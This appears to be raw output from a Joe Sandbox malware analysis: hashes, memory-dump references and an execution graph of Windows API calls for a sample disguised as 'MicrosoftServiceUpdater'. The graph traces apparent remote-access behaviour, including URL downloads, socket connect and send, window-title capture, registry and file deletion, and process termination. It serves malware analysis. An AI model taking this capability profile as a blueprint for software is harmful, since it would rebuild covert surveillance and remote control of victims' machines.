                                                                                                                                                                                          • Opcode Fuzzy Hash: 7302f258e324082df56eb9e906256855f42b6e92faf740384e3aaa5bd17368a5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A11CA62A0D6C185FB524B25A544679FFE1E749FE1F48A270DA1E437C9CFBF98808700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 140117192-0
                                                                                                                                                                                          • Opcode ID: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                                                                                                                                                                                          • Instruction ID: c648f361ff05b9e4d9d9d78a7bee44f283ac056fc3a91bfd60d7f967b06db371
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ccba7e9cb8161b6830b4bdced448ba4434f463bc3dcbbf20418d4b2244445be
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C21E735A0CB4581FB418B54F880B65B3A4FB86B84F502136DA8D83764DFBFD044E700
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000F.00000002.1525236957.00007FF636341000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF636340000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525007842.00007FF636340000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525655327.00007FF636349000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1525849956.00007FF63634C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000F.00000002.1526343036.00007FF63634E000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_15_2_7ff636340000_MicrosoftServiceUpdater.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2776232527-0
                                                                                                                                                                                          • Opcode ID: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                                                                                                                                                                                          • Instruction ID: ddef66f16c1d86472b9a10581a265975e265c453c34887293638b6807336c82e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e89c7557f5549cdd1f7fcb2b8838b8889091e68e9dc0b1ab03ce0efe7400e88
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A117732A1C64287F7608F21E444F76EA90FB99745F80A134DA4A83A84DF7FD448DF00

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:5.9%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:2.8%
                                                                                                                                                                                          Signature Coverage:2.2%
                                                                                                                                                                                          Total number of Nodes:1811
                                                                                                                                                                                          Total number of Limit Nodes:66
                                                                                                                                                                                          execution_graph 53080 415d41 53095 41b411 53080->53095 53082 415d4a 53106 4020f6 53082->53106 53087 4170c4 53130 401e8d 53087->53130 53091 401fd8 11 API calls 53092 4170d9 53091->53092 53093 401fd8 11 API calls 53092->53093 53094 4170e5 53093->53094 53136 4020df 53095->53136 53100 41b456 InternetReadFile 53105 41b479 53100->53105 53102 41b4a6 InternetCloseHandle InternetCloseHandle 53103 41b4b8 53102->53103 53103->53082 53104 401fd8 11 API calls 53104->53105 53105->53100 53105->53102 53105->53104 53147 4020b7 53105->53147 53107 40210c 53106->53107 53108 4023ce 11 API calls 53107->53108 53109 402126 53108->53109 53110 402569 28 API calls 53109->53110 53111 402134 53110->53111 53112 404aa1 53111->53112 53113 404ab4 53112->53113 53214 40520c 53113->53214 53115 404ac9 ctype 53116 404b40 WaitForSingleObject 53115->53116 53117 404b20 53115->53117 53119 404b56 53116->53119 53118 404b32 send 53117->53118 53120 404b7b 53118->53120 53220 4210cb 54 API calls 53119->53220 53123 401fd8 11 API calls 53120->53123 53122 404b69 SetEvent 53122->53120 53124 404b83 53123->53124 53125 401fd8 11 API calls 53124->53125 53126 404b8b 53125->53126 53126->53087 53127 401fd8 53126->53127 53128 4023ce 11 API calls 53127->53128 53129 401fe1 53128->53129 53129->53087 53131 402163 53130->53131 53132 40219f 53131->53132 53238 402730 11 API calls 53131->53238 53132->53091 53134 402184 53239 402712 11 API calls std::_Deallocate 53134->53239 53137 4020e7 53136->53137 53153 4023ce 53137->53153 53139 4020f2 53140 43bda0 53139->53140 53146 4461b8 __Getctype 53140->53146 53141 4461f6 53169 44062d 20 API calls _Atexit 53141->53169 53142 4461e1 RtlAllocateHeap 53144 41b42f InternetOpenW InternetOpenUrlW 53142->53144 53142->53146 53144->53100 53146->53141 53146->53142 53168 443001 7 API calls 2 library calls 53146->53168 53148 4020bf 53147->53148 53149 4023ce 11 API calls 53148->53149 53150 4020ca 53149->53150 53170 40250a 53150->53170 53152 4020d9 53152->53105 53154 402428 53153->53154 53155 4023d8 53153->53155 53154->53139 53155->53154 53157 4027a7 53155->53157 53158 402e21 53157->53158 53161 4016b4 53158->53161 53160 402e30 53160->53154 53162 4016cb 53161->53162 53163 4016c6 53161->53163 53162->53163 53164 4016f3 53162->53164 53167 43bd68 11 API calls _Atexit 53163->53167 53164->53160 53166 43bd67 53167->53166 53168->53146 53169->53144 53171 40251a 53170->53171 53172 402520 53171->53172 53173 402535 53171->53173 53177 402569 53172->53177 53187 4028e8 53173->53187 53176 402533 53176->53152 53198 402888 53177->53198 53179 40257d 53180 402592 53179->53180 53181 4025a7 53179->53181 53203 402a34 22 API calls 53180->53203 53183 4028e8 28 API calls 53181->53183 53186 4025a5 53183->53186 53184 40259b 53204 4029da 22 API calls 53184->53204 53186->53176 53188 4028f1 53187->53188 53189 402953 53188->53189 53190 4028fb 53188->53190 53212 4028a4 22 API calls 53189->53212 53193 402904 53190->53193 53194 402917 53190->53194 53206 402cae 53193->53206 53196 402915 53194->53196 53197 4023ce 11 API calls 53194->53197 53196->53176 53197->53196 53199 402890 53198->53199 53200 402898 53199->53200 53205 402ca3 22 API calls 53199->53205 53200->53179 53203->53184 53204->53186 53207 402cb8 __EH_prolog 53206->53207 53213 402e54 22 API calls 53207->53213 53209 4023ce 11 API calls 53211 402d92 53209->53211 53210 402d24 53210->53209 53211->53196 53213->53210 53215 405214 53214->53215 53216 4023ce 11 API calls 53215->53216 53217 40521f 53216->53217 53221 405234 53217->53221 53219 40522e 53219->53115 53220->53122 53222 405240 53221->53222 53223 40526e 53221->53223 53225 4028e8 28 API calls 53222->53225 53237 4028a4 22 API calls 53223->53237 53226 40524a 53225->53226 53226->53219 53238->53134 53239->53132 53240 416664 Sleep 53240->53240 53241 416674 53240->53241 53243 40d0d1 53241->53243 53330 41288b TerminateProcess WaitForSingleObject 53243->53330 53245 40d0e0 53246 40d0f3 53245->53246 53331 40b8e7 TerminateThread 53245->53331 53248 40d103 53246->53248 53394 419b25 9 API calls 53246->53394 53250 40d10c 53248->53250 53252 40d11d 53248->53252 53395 41c322 9 API calls 53250->53395 53254 40d143 53252->53254 53338 413a5e RegOpenKeyExW 53252->53338 53255 413a5e 2 API calls 53254->53255 53256 40d162 53254->53256 53255->53256 53257 413a5e 2 API calls 53256->53257 53258 40d17f ___scrt_fastfail 53256->53258 53257->53258 53341 413733 RegOpenKeyExA 53258->53341 53260 40d1cf 53261 40d1e6 53260->53261 53262 40d1d6 GetModuleFileNameW 53260->53262 53263 40d1ed RegDeleteKeyA 53261->53263 53262->53261 53264 40d20c 53263->53264 53265 40d225 SetFileAttributesW 53264->53265 53266 40d216 53264->53266 53344 41ba09 53265->53344 53268 40d222 SetFileAttributesW 53266->53268 53268->53265 53271 40d253 53360 403014 53271->53360 53276 401fd8 11 API calls 53277 40d274 53276->53277 53368 40417e 53277->53368 53280 403014 28 API calls 53281 40d2a1 53280->53281 53374 40431d 53281->53374 53284 401f09 11 API calls 53285 40d2b7 53284->53285 53286 401f09 11 API calls 53285->53286 53287 40d2c0 53286->53287 53288 40417e 28 API calls 53287->53288 53289 40d2ce 53288->53289 53379 4042fc 53289->53379 53292 401f09 11 API calls 53293 40d2e7 53292->53293 53294 40d343 53293->53294 53295 40417e 28 API calls 53293->53295 53296 40417e 28 API calls 53294->53296 53297 40d302 53295->53297 53298 40d35e 53296->53298 53300 4042fc 79 API calls 53297->53300 53299 403014 28 API calls 53298->53299 53301 40d369 53299->53301 53302 40d311 53300->53302 53303 403014 28 API calls 53301->53303 53304 403014 28 API calls 53302->53304 53305 40d375 53303->53305 53306 40d31d 53304->53306 53307 401f09 11 API calls 53305->53307 53308 401f09 11 API calls 53306->53308 53309 40d389 53307->53309 53310 40d331 53308->53310 53311 401f09 11 API calls 53309->53311 53312 401f09 11 API calls 53310->53312 53313 40d392 53311->53313 53314 40d33a 53312->53314 53315 401f09 11 API calls 53313->53315 53316 401f09 11 API calls 53314->53316 53317 40d39b 53315->53317 53316->53294 53322 40d3fc 53317->53322 53396 40b9b7 28 API calls 53317->53396 53319 40d3d3 53320 403014 28 API calls 53319->53320 53321 40d3df 53320->53321 53323 401f09 11 API calls 53321->53323 53384 41c482 53322->53384 53324 40d3f3 53323->53324 53326 401f09 11 API calls 53324->53326 53326->53322 53327 40d434 53328 40d453 ExitProcess 53327->53328 53329 40d446 ShellExecuteW 53327->53329 53329->53328 53330->53245 53332 40b900 UnhookWindowsHookEx TerminateThread 53331->53332 53333 40b8a4 53331->53333 53332->53333 53334 40b8b0 DeleteFileW 53333->53334 53336 40b8cc 53334->53336 53335 40b8e2 53335->53246 53336->53335 53337 40b8db RemoveDirectoryW 53336->53337 53337->53335 53339 413a76 53338->53339 53340 413a7a RegDeleteValueW 53338->53340 53339->53254 53340->53339 53342 41377d 53341->53342 53343 413759 RegQueryValueExA RegCloseKey 53341->53343 53342->53260 53343->53342 53345 4020df 11 API calls 53344->53345 53346 41ba19 53345->53346 53397 41b34b 53346->53397 53352 40d248 53356 41bcef 53352->53356 53353 441c9a 36 API calls 53355 41ba50 53353->53355 53355->53352 53355->53353 53406 41d063 28 API calls 53355->53406 53357 41bd03 53356->53357 53458 40b93f 53357->53458 53359 41bd0b 53359->53271 53490 403222 53360->53490 53362 403022 53494 403262 53362->53494 53365 401f09 53366 402252 11 API calls 53365->53366 53367 401f12 53366->53367 53367->53276 53369 404186 53368->53369 53370 402252 11 API calls 53369->53370 53371 404191 53370->53371 53526 4041bc 53371->53526 53549 40323f 53374->53549 53376 40432b 53377 403262 11 API calls 53376->53377 53378 40433a 53377->53378 53378->53284 53552 404353 53379->53552 53381 40430a 53382 403262 11 API calls 53381->53382 53383 404319 53382->53383 53383->53292 53385 41c495 CreateFileW 53384->53385 53387 41c4d2 53385->53387 53388 41c4ce 53385->53388 53389 41c4f2 WriteFile 53387->53389 53390 41c4d9 SetFilePointer 53387->53390 53388->53327 53392 41c505 53389->53392 53393 41c507 CloseHandle 53389->53393 53390->53389 53391 41c4e9 CloseHandle 53390->53391 53391->53388 53392->53393 53393->53388 53394->53248 53395->53252 53396->53319 53407 43ab1a 53397->53407 53400 441cbb 53418 448295 GetLastError 53400->53418 53402 41ba44 53403 441c9a 53402->53403 53404 448295 _Atexit 36 API calls 53403->53404 53405 441c9f 53404->53405 53405->53355 53406->53355 53410 43aa9b 53407->53410 53409 41b352 GetCurrentProcessId 53409->53400 53411 43aaaa 53410->53411 53412 43aabe 53410->53412 53416 44062d 20 API calls _Atexit 53411->53416 53415 43aaaf __alldvrm ___std_exception_copy 53412->53415 53417 4489d7 11 API calls 2 library calls 53412->53417 53415->53409 53416->53415 53417->53415 53419 4482b1 53418->53419 53420 4482ab 53418->53420 53424 448300 SetLastError 53419->53424 53439 445b74 53419->53439 53438 44883c 11 API calls 2 library calls 53420->53438 53424->53402 53425 4482cb 53446 446802 53425->53446 53427 4482e0 53427->53425 53429 4482e7 53427->53429 53453 448107 20 API calls _Atexit 53429->53453 53430 4482d1 53432 44830c SetLastError 53430->53432 53454 446175 36 API calls 4 library calls 53432->53454 53433 4482f2 53435 446802 _free 20 API calls 53433->53435 53437 4482f9 53435->53437 53436 448318 53437->53424 53437->53432 53438->53419 53444 445b81 __Getctype 53439->53444 53440 445bc1 53456 44062d 20 API calls _Atexit 53440->53456 53441 445bac RtlAllocateHeap 53442 445bbf 53441->53442 53441->53444 53442->53425 53452 448892 11 API calls 2 library calls 53442->53452 53444->53440 53444->53441 53455 443001 7 API calls 2 library calls 53444->53455 53447 44680d RtlFreeHeap 53446->53447 53448 446836 _free 53446->53448 53447->53448 53449 446822 53447->53449 53448->53430 53457 44062d 20 API calls _Atexit 53449->53457 53451 446828 GetLastError 53451->53448 53452->53427 53453->53433 53454->53436 53455->53444 53456->53442 53457->53451 53459 40b947 53458->53459 53464 402252 53459->53464 53461 40b952 53468 40b967 53461->53468 53463 40b961 53463->53359 53465 40225c 53464->53465 53466 4022ac 53464->53466 53465->53466 53475 402779 11 API calls std::_Deallocate 53465->53475 53466->53461 53469 40b9a1 53468->53469 53470 40b973 53468->53470 53487 4028a4 22 API calls 53469->53487 53476 4027e6 53470->53476 53474 40b97d 53474->53463 53475->53466 53477 4027ef 53476->53477 53478 402851 53477->53478 53479 4027f9 53477->53479 53489 4028a4 22 API calls 53478->53489 53482 402802 53479->53482 53483 402815 53479->53483 53488 402aea 28 API calls __EH_prolog 53482->53488 53485 402813 53483->53485 53486 402252 11 API calls 53483->53486 53485->53474 53486->53485 53488->53485 53491 40322e 53490->53491 53500 403618 53491->53500 53493 40323b 53493->53362 53495 40326e 53494->53495 53496 402252 11 API calls 53495->53496 53497 403288 53496->53497 53522 402336 53497->53522 53501 403626 53500->53501 53502 403644 53501->53502 53503 40362c 53501->53503 53505 40365c 53502->53505 53506 40369e 53502->53506 53511 4036a6 53503->53511 53509 4027e6 28 API calls 53505->53509 53510 403642 53505->53510 53520 4028a4 22 API calls 53506->53520 53509->53510 53510->53493 53512 402888 22 API calls 53511->53512 53513 4036b9 53512->53513 53514 40372c 53513->53514 53515 4036de 53513->53515 53521 4028a4 22 API calls 53514->53521 53518 4027e6 28 API calls 53515->53518 53519 4036f0 53515->53519 53518->53519 53519->53510 53523 402347 53522->53523 53524 402252 11 API calls 53523->53524 53525 4023c7 53524->53525 53525->53365 53527 4041c8 53526->53527 53530 4041d9 53527->53530 53529 40419c 53529->53280 53531 4041e9 53530->53531 53532 404206 53531->53532 53533 4041ef 53531->53533 53534 4027e6 28 API calls 53532->53534 53537 404267 53533->53537 53536 404204 53534->53536 53536->53529 53538 402888 22 API calls 53537->53538 53539 40427b 53538->53539 53540 404290 53539->53540 53541 4042a5 53539->53541 53547 4042df 22 API calls 53540->53547 53542 4027e6 28 API calls 53541->53542 53546 4042a3 53542->53546 53544 404299 53548 402c48 22 API calls 53544->53548 53546->53536 53547->53544 53548->53546 53550 4036a6 28 API calls 53549->53550 53551 40324c 53550->53551 53551->53376 53553 40435f 53552->53553 53556 404371 53553->53556 53555 40436d 53555->53381 53557 40437f 53556->53557 53558 404385 53557->53558 53559 40439e 53557->53559 53620 4034e6 28 API calls 53558->53620 53560 402888 22 API calls 53559->53560 53561 4043a6 53560->53561 53563 404419 53561->53563 53564 4043bf 53561->53564 53621 4028a4 22 API calls 53563->53621 53566 4027e6 28 API calls 53564->53566 53576 40439c 53564->53576 53566->53576 53576->53555 53620->53576 53622 416be6 53642 401e65 53622->53642 53624 416bf2 53625 416c07 53624->53625 53626 416c1e 53624->53626 53627 401e65 22 API calls 53625->53627 53628 401e65 22 API calls 53626->53628 53629 416c0c 53627->53629 53630 416c23 53628->53630 53631 4020f6 28 API calls 53629->53631 53632 4020f6 28 API calls 53630->53632 53633 416c17 53631->53633 53632->53633 53647 417308 53633->53647 53636 401e8d 11 API calls 53637 4170cd 53636->53637 53638 401fd8 11 API calls 53637->53638 53639 4170d9 53638->53639 53640 401fd8 11 API calls 53639->53640 53641 4170e5 53640->53641 53644 401e6d 53642->53644 53643 401e75 53643->53624 53644->53643 53681 402158 22 API calls 53644->53681 53648 4174c0 53647->53648 53649 41731e 53647->53649 53651 401fd8 11 API calls 53648->53651 53682 4046f7 53649->53682 53653 416c38 53651->53653 53653->53636 53656 4174b2 53788 404ee2 99 API calls 53656->53788 53661 417365 53758 402ea1 53661->53758 53664 404aa1 61 API calls 53665 417380 53664->53665 53666 401fd8 11 API calls 53665->53666 53667 417388 53666->53667 53668 401fd8 11 API calls 53667->53668 53670 417390 53668->53670 53672 4020b7 28 API calls 53670->53672 53674 41bdaf 28 API calls 53670->53674 53675 402ea1 28 API calls 53670->53675 53676 404aa1 61 API calls 53670->53676 53677 401fd8 11 API calls 53670->53677 53678 401f09 11 API calls 53670->53678 53679 4174a7 53670->53679 53767 41b80c GlobalMemoryStatusEx 53670->53767 53768 41b890 GetSystemTimes Sleep GetSystemTimes 53670->53768 53770 41bb27 53670->53770 53672->53670 53674->53670 53675->53670 53676->53670 53677->53670 53678->53670 53775 404e26 WaitForSingleObject 53679->53775 53683 4020df 11 API calls 53682->53683 53684 404707 53683->53684 53685 4020df 11 API calls 53684->53685 53687 40471e 53685->53687 53686 404736 53689 4048c8 connect 53686->53689 53687->53686 53789 40482d 53687->53789 53690 404a1b 53689->53690 53691 4048ee 53689->53691 53692 40497e 53690->53692 53693 404a21 WSAGetLastError 53690->53693 53691->53692 53694 404923 53691->53694 53797 40531e 53691->53797 53692->53656 53749 41bdaf 53692->53749 53693->53692 53695 404a31 53693->53695 53832 420cf1 27 API calls 53694->53832 53697 404932 53695->53697 53698 404a36 53695->53698 53703 402093 28 API calls 53697->53703 53837 41cb72 30 API calls 53698->53837 53700 40490f 53802 402093 53700->53802 53702 40492b 53702->53697 53706 404941 53702->53706 53707 404a80 53703->53707 53705 404a40 53838 4052fd 28 API calls 53705->53838 53713 404950 53706->53713 53714 404987 53706->53714 53710 402093 28 API calls 53707->53710 53715 404a8f 53710->53715 53717 402093 28 API calls 53713->53717 53834 421ad1 54 API calls 53714->53834 53718 41b580 80 API calls 53715->53718 53721 40495f 53717->53721 53718->53692 53727 402093 28 API calls 53721->53727 53722 40498f 53724 4049c4 53722->53724 53725 404994 53722->53725 53836 420e97 28 API calls 53724->53836 53728 402093 28 API calls 53725->53728 53730 40496e 53727->53730 53732 4049a3 53728->53732 53733 41b580 80 API calls 53730->53733 53735 402093 28 API calls 53732->53735 53736 404973 53733->53736 53734 4049cc 53737 4049f9 CreateEventW CreateEventW 53734->53737 53739 402093 28 API calls 53734->53739 53738 4049b2 53735->53738 53833 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53736->53833 53737->53692 53740 41b580 80 API calls 53738->53740 53742 4049e2 53739->53742 53743 4049b7 53740->53743 53744 402093 28 API calls 53742->53744 53835 421143 52 API calls 53743->53835 53745 4049f1 53744->53745 53747 41b580 80 API calls 53745->53747 53748 4049f6 53747->53748 53748->53737 53750 41bdbc 53749->53750 53751 4020b7 28 API calls 53750->53751 53752 41734f 53751->53752 53753 402f31 53752->53753 53754 4020df 11 API calls 53753->53754 53755 402f3d 53754->53755 53756 4032a0 28 API calls 53755->53756 53757 402f59 53756->53757 53757->53661 53760 402eb0 53758->53760 53759 402ef2 53761 401fb0 28 API calls 53759->53761 53760->53759 53765 402ee7 53760->53765 53762 402ef0 53761->53762 53763 402055 11 API calls 53762->53763 53764 402f09 53763->53764 53764->53664 53897 403365 28 API calls 53765->53897 53767->53670 53769 41b8d5 _swprintf __aulldiv 53768->53769 53769->53670 53898 436f10 53770->53898 53773 40417e 28 API calls 53774 41bb70 53773->53774 53774->53670 53776 404e40 SetEvent CloseHandle 53775->53776 53777 404e57 closesocket 53775->53777 53778 404ed8 53776->53778 53779 404e64 53777->53779 53778->53656 53780 404e7a 53779->53780 53900 4050e4 84 API calls 53779->53900 53782 404e8c WaitForSingleObject 53780->53782 53783 404ece SetEvent CloseHandle 53780->53783 53901 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53782->53901 53783->53778 53785 404e9b SetEvent WaitForSingleObject 53902 41e7a2 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 53785->53902 53787 404eb3 SetEvent CloseHandle CloseHandle 53787->53783 53790 404846 socket 53789->53790 53791 404839 53789->53791 53792 404860 CreateEventW 53790->53792 53793 404842 53790->53793 53796 40489e WSAStartup 53791->53796 53792->53686 53793->53686 53795 40483e 53795->53790 53795->53793 53796->53795 53798 4020df 11 API calls 53797->53798 53799 40532a 53798->53799 53839 4032a0 53799->53839 53801 405346 53801->53700 53803 40209b 53802->53803 53804 4023ce 11 API calls 53803->53804 53805 4020a6 53804->53805 53843 4024ed 53805->53843 53808 41b580 53809 41b631 53808->53809 53810 41b596 GetLocalTime 53808->53810 53812 401fd8 11 API calls 53809->53812 53811 40531e 28 API calls 53810->53811 53813 41b5d8 53811->53813 53814 41b639 53812->53814 53847 406383 53813->53847 53816 401fd8 11 API calls 53814->53816 53818 41b641 53816->53818 53818->53694 53821 406383 28 API calls 53822 41b5fc 53821->53822 53857 40723b 77 API calls 53822->53857 53824 41b60a 53825 401fd8 11 API calls 53824->53825 53826 41b616 53825->53826 53827 401fd8 11 API calls 53826->53827 53828 41b61f 53827->53828 53829 401fd8 11 API calls 53828->53829 53830 41b628 53829->53830 53831 401fd8 11 API calls 53830->53831 53831->53809 53832->53702 53833->53692 53834->53722 53835->53736 53836->53734 53837->53705 53841 4032aa 53839->53841 53840 4032c9 53840->53801 53841->53840 53842 4028e8 28 API calls 53841->53842 53842->53840 53844 4024f9 53843->53844 53845 40250a 28 API calls 53844->53845 53846 4020b1 53845->53846 53846->53808 53858 4051ef 53847->53858 53849 406391 53862 402055 53849->53862 53852 402f10 53894 401fb0 53852->53894 53854 402f1e 53855 402055 11 API calls 53854->53855 53856 402f2d 53855->53856 53856->53821 53857->53824 53859 4051fb 53858->53859 53868 405274 53859->53868 53861 405208 53861->53849 53863 402061 53862->53863 53864 4023ce 11 API calls 53863->53864 53865 40207b 53864->53865 53890 40267a 53865->53890 53869 405282 53868->53869 53870 405288 53869->53870 53871 40529e 53869->53871 53879 4025f0 53870->53879 53872 4052f5 53871->53872 53873 4052b6 53871->53873 53888 4028a4 22 API calls 53872->53888 53876 4028e8 28 API calls 53873->53876 53878 40529c 53873->53878 53876->53878 53878->53861 53880 402888 22 API calls 53879->53880 53881 402602 53880->53881 53882 402672 53881->53882 53883 402629 53881->53883 53889 4028a4 22 API calls 53882->53889 53885 4028e8 28 API calls 53883->53885 53887 40263b 53883->53887 53885->53887 53887->53878 53891 40268b 53890->53891 53892 4023ce 11 API calls 53891->53892 53893 40208d 53892->53893 53893->53852 53895 4025f0 28 API calls 53894->53895 53896 401fbd 53895->53896 53896->53854 53897->53762 53899 41bb46 GetForegroundWindow GetWindowTextW 53898->53899 53899->53773 53900->53780 53901->53785 53902->53787 53903 1000c7a7 53904 1000c7be 53903->53904 53913 1000c82c 53903->53913 53904->53913 53915 1000c7e6 GetModuleHandleA 53904->53915 53906 1000c872 53907 1000c835 GetModuleHandleA 53908 1000c83f 53907->53908 53908->53908 53910 1000c85f GetProcAddress 53908->53910 53908->53913 53910->53913 53913->53906 53913->53907 53913->53908 53916 1000c7ef 53915->53916 53918 1000c82c 53915->53918 53927 1000c803 GetProcAddress 53916->53927 53920 1000c872 53918->53920 53921 1000c835 GetModuleHandleA 53918->53921 53926 1000c83f 53918->53926 53921->53926 53925 1000c85f GetProcAddress 53925->53918 53926->53918 53926->53925 53928 1000c82c 53927->53928 53929 1000c80d VirtualProtect 53927->53929 53931 1000c872 53928->53931 53932 1000c835 GetModuleHandleA 53928->53932 53929->53928 53930 1000c81c VirtualProtect 53929->53930 53930->53928 53933 1000c83f 53932->53933 53933->53928 53933->53933 53934 1000c85f GetProcAddress 53933->53934 53934->53933 53935 42d50a 53936 42d522 ___scrt_fastfail 53935->53936 53941 42d5c8 53935->53941 53938 42d56e 53936->53938 53936->53941 53959 42d768 21 API calls ___scrt_fastfail 53936->53959 53960 42d768 21 API calls ___scrt_fastfail 53938->53960 53940 42d573 53940->53941 53961 42d448 23 API calls 53940->53961 53943 42d58d 53943->53941 53962 430abf 22 API calls 53943->53962 53945 42d614 53947 42d676 53945->53947 53990 42f90e 22 API calls 53945->53990 53947->53941 53963 42cf79 53947->53963 53951 42d628 53951->53947 53991 430abf 22 API calls 53951->53991 53953 42d6c2 53953->53941 53993 43429b 22 API calls 53953->53993 53955 42d6fb 53955->53941 53994 43429b 22 API calls 53955->53994 53957 42d714 53957->53941 53995 43429b 22 API calls 53957->53995 53959->53936 53960->53940 53961->53943 53962->53945 53996 42f90e 22 API calls 53963->53996 53965 42cf93 53968 42cff7 53965->53968 53997 42f90e 22 API calls 53965->53997 53967 42cfaa 53967->53968 53998 42f90e 22 API calls 53967->53998 53986 42d062 53968->53986 54002 42cea9 53968->54002 53971 42cfbd 53971->53968 53999 42c9dc 23 API calls 53971->53999 53973 42d43c 53973->53941 53992 432cfc 22 API calls 53973->53992 53974 42cfd3 53974->53968 54000 42d7d3 22 API calls 53974->54000 53975 42d02f 53977 42cea9 26 API calls 53975->53977 53975->53986 53976 42d409 54027 42f90e 22 API calls 53976->54027 53977->53986 53981 42cfe6 53981->53968 54001 42d7d3 22 API calls 53981->54001 53982 42d416 53982->53973 54028 42f90e 22 API calls 53982->54028 53985 42d429 53985->53973 54029 42f90e 22 API calls 53985->54029 53986->53973 53986->53976 53988 43429b 22 API calls 53986->53988 54025 42c44f 23 API calls 53986->54025 54026 42c9dc 23 API calls 53986->54026 53988->53986 53990->53951 53991->53947 53992->53953 53993->53955 53994->53957 53995->53941 53996->53965 53997->53967 53998->53971 53999->53974 54000->53981 54001->53968 54030 42dae7 54002->54030 54004 42cebc 54024 42cf71 54004->54024 54037 431ba8 23 API calls 54004->54037 54006 42ced7 54006->54024 54038 4316e5 22 API calls 54006->54038 54008 42ceef 54008->54024 54039 431b7b 23 API calls 54008->54039 54010 42cf01 54010->54024 54040 4316e5 22 API calls 54010->54040 54012 42cf10 54012->54024 54041 431ba8 23 API calls 54012->54041 54014 42cf23 54014->54024 54042 4316e5 22 API calls 54014->54042 54016 42cf30 54016->54024 54043 431ba8 23 API calls 54016->54043 54018 42cf43 54018->54024 54044 4316e5 22 API calls 54018->54044 54020 42cf50 54020->54024 54045 431ba8 23 API calls 54020->54045 54022 42cf64 54022->54024 54046 4316e5 22 API calls 54022->54046 54024->53975 54025->53986 54026->53986 54027->53982 54028->53985 54029->53973 54047 4335e7 54030->54047 54032 42dafb 54033 42db31 54032->54033 54051 42fc52 54032->54051 54033->54004 54035 42db10 54035->54033 54057 4307a2 54035->54057 54037->54006 54038->54008 54039->54010 54040->54012 54041->54014 54042->54016 54043->54018 54044->54020 54045->54022 54046->54024 54048 433617 54047->54048 54049 4335fc 54047->54049 54048->54032 54049->54048 54064 4338c8 CryptAcquireContextA 54049->54064 54052 42fc60 54051->54052 54054 42fc65 54051->54054 54068 42f97e 54052->54068 54055 42fc97 54054->54055 54072 42fca2 22 API calls 54054->54072 54055->54035 54101 431c95 21 API calls 54057->54101 54059 4307b9 54062 4307d5 54059->54062 54102 43081c 22 API calls 54059->54102 54061 4307cd 54061->54062 54103 430abf 22 API calls 54061->54103 54062->54033 54065 4338e4 54064->54065 54066 4338e9 CryptGenRandom 54064->54066 54065->54048 54066->54065 54067 4338fe CryptReleaseContext 54066->54067 54067->54065 54069 42f989 54068->54069 54071 42f99d 54069->54071 54073 432f7f 54069->54073 54071->54054 54072->54054 54074 432f8a 54073->54074 54075 432f8e 54073->54075 54074->54071 54077 440f5d 54075->54077 54078 446206 54077->54078 54079 446213 54078->54079 54080 44621e 54078->54080 54090 4461b8 54079->54090 54082 446226 54080->54082 54088 44622f __Getctype 54080->54088 54083 446802 _free 20 API calls 54082->54083 54086 44621b 54083->54086 54084 446234 54097 44062d 20 API calls _Atexit 54084->54097 54085 446259 RtlReAllocateHeap 54085->54086 54085->54088 54086->54074 54088->54084 54088->54085 54098 443001 7 API calls 2 library calls 54088->54098 54091 4461f6 54090->54091 54092 4461c6 __Getctype 54090->54092 54100 44062d 20 API calls _Atexit 54091->54100 54092->54091 54093 4461e1 RtlAllocateHeap 54092->54093 54099 443001 7 API calls 2 library calls 54092->54099 54093->54092 54095 4461f4 54093->54095 54095->54086 54097->54086 54098->54088 54099->54092 54100->54095 54101->54059 54102->54061 54103->54062 54104 43bea8 54107 43beb4 _swprintf ___DestructExceptionObject 54104->54107 54105 43bec2 54120 44062d 20 API calls _Atexit 54105->54120 54107->54105 54108 43beec 54107->54108 54115 445909 EnterCriticalSection 54108->54115 54110 43bec7 ___DestructExceptionObject ___std_exception_copy 54111 43bef7 54116 43bf98 54111->54116 